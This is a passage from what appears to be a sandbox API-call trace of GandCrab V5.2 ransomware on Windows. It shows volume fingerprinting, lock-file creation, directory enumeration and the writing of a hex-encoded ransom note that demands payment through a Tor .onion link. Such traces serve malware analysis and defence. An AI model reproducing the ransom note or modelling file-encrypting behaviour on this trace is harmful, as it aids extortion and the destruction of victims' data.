\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.104] WriteFile (in: hFile=0x228, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f79c, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f79c*=0x2162, lpOverlapped=0x0) returned 1 [0096.105] CloseHandle (hObject=0x228) returned 1 [0096.105] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.105] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.106] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x1aa)) [0096.106] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.106] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.106] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.106] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock") returned 41 [0096.106] CreateFileW (lpFileName="C:\\Users\\Default\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x228 [0096.107] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.107] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.107] lstrlenW (lpString="C:\\Users\\Default\\") returned 17 [0096.107] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\*") returned="C:\\Users\\Default\\*" [0096.107] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\*", fInfoLevelId=0x1, lpFindFileData=0x259f7b8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f7b8) returned 0x503578 [0096.107] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.107] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.108] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.108] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.108] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f7b8 | out: lpFindFileData=0x259f7b8) returned 1 [0096.108] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0096.108] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0096.108] lstrcatW (in: lpString1="C:\\Users\\Default\\", lpString2="AppData" | out: lpString1="C:\\Users\\Default\\AppData") returned="C:\\Users\\Default\\AppData" [0096.108] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\") returned="C:\\Users\\Default\\AppData\\" [0096.108] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.108] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.108] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.109] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.109] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.109] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.109] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.109] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.109] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.109] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\\\TITWMVJL-DECRYPT.txt") returned 46 [0096.109] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0096.110] lstrlenW (lpString="\xfeff\x2d\x2d\x2d\x3d\x20\x20\x20\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x56\x35\x2e\x32\x20\x20\x20\x20\x3d\x2d\x2d\x2d\x20\x0d\x0a\x0d\x0a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x55\x4e\x44\x45\x52\x20\x4e\x4f\x20\x43\x49\x52\x43\x55\x4d\x53\x54\x41\x4e\x43\x45\x53\x20\x44\x4f\x20\x4e\x4f\x54\x20\x44\x45\x4c\x45\x54\x45\x20\x54\x48\x49\x53\x20\x46\x49\x4c\x45\x2c\x20\x55\x4e\x54\x49\x4c\x20\x41\x4c\x4c\x20\x59\x4f\x55\x52\x20\x44\x41\x54\x41\x20\x49\x53\x20\x52\x45\x43\x4f\x56\x45\x52\x45\x44\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x09\x2a\x2a\x2a\x2a\x2a\x46\x41\x49\x4c\x49\x4e\x47\x20\x54\x4f\x20\x44\x4f\x20\x53\x4f\x2c\x20\x57\x49\x4c\x4c\x20\x52\x45\x53\x55\x4c\x54\x20\x49\x4e\x20\x59\x4f\x55\x52\x20\x53\x59\x53\x54\x45\x4d\x20\x43\x4f\x52\x52\x55\x50\x54\x49\x4f\x4e\x2c\x20\x49\x46\x20\x54\x48\x45\x52\x45\x20\x41\x52\x45\x20\x44\x45\x43\x52\x59\x50\x54\x49\x4f\x4e\x20\x45\x52\x52\x4f\x52\x53\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x0d\x0a\x41\x74\x74\x65\x6e\x74\x69\x6f\x6e\x21\x20\x0d\x0a\x0d\x0a\x41\x6c\x6c\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2c\x20\x64\x6f\x63\x75\x6d\x65\x6e\x74\x73\x2c\x20\x70\x68\x6f\x74\x6f\x73\x2c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x73\x20\x61\x6e\x64\x20\x6f\x74\x68\x65\x72\x20\x69\x6d\x70\x6f\x72\x74\x61\x6e\x74\x20\x66\x69\x6c\x65\x73\x20\x61\x72\x65\x20\x65\x6e\x63\x72\x79\x70\x74\x65\x64\x20\x61\x6e\x64\x20\x68\x61\x76\x65\x20\x74\x68\x65\x20\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x3a\x20\x2e\x54\x49\x54\x57\x4d\x56\x4a\x4c\x20\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x6f\x6e\x6c\x79\x20\x6d\x65\x74\x68\x6f\x64\x20\x6f\x66\x20\x72\x65\x63\x6f\x76\x65\x72\x69\x6e\x67\x20\x66\x69\x6c\x65\x73\x20\x69\x73\x20\x74\x6f\x20\x70\x75\x72\x63\x68\x61\x73\x65\x20\x61\x6e\x20\x75\x6e\x69\x71\x75\x65\x20\x70\x72\x69\x76\x61\x74\x65\x20\x6b\x65\x79\x2e\x20\x4f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x67\x69\x76\x65\x20\x79\x6f\x75\x20\x74\x68\x69\x73\x20\x6b\x65\x79\x20\x61\x6e\x64\x20\x6f\x6e\x6c\x79\x20\x77\x65\x20\x63\x61\x6e\x20\x72\x65\x63\x6f\x76\x65\x72\x20\x79\x6f\x75\x72\x20\x66\x69\x6c\x65\x73\x2e\x0d\x0a\x0d\x0a\x0d\x0a\x54\x68\x65\x20\x73\x65\x72\x76\x65\x72\x20\x77\x69\x74\x68\x20\x79\x6f\x75\x72\x20\x6b\x65\x79\x20\x69\x73\x20\x69\x6e\x20\x61\x20\x63\x6c\x6f\x73\x65\x64\x20\x6e\x65\x74\x77\x6f\x72\x6b\x20\x54\x4f\x52\x2e\x20\x59\x6f\x75\x20\x63\x61\x6e\x20\x67\x65\x74\x20\x74\x68\x65\x72\x65\x20\x62\x79\x20\x74\x68\x65\x20\x66\x6f\x6c\x6c\x6f\x77\x69\x6e\x67\x20\x77\x61\x79\x73\x3a\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x7c\x20\x30\x2e\x20\x44\x6f\x77\x6e\x6c\x6f\x61\x64\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x2d\x20\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x74\x6f\x72\x70\x72\x6f\x6a\x65\x63\x74\x2e\x6f\x72\x67\x2f\x20\x0d\x0a\x0d\x0a\x7c\x20\x31\x2e\x20\x49\x6e\x73\x74\x61\x6c\x6c\x20\x54\x6f\x72\x20\x62\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x32\x2e\x20\x4f\x70\x65\x6e\x20\x54\x6f\x72\x20\x42\x72\x6f\x77\x73\x65\x72\x20\x0d\x0a\x7c\x20\x33\x2e\x20\x4f\x70\x65\x6e\x20\x6c\x69\x6e\x6b\x20\x69\x6e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x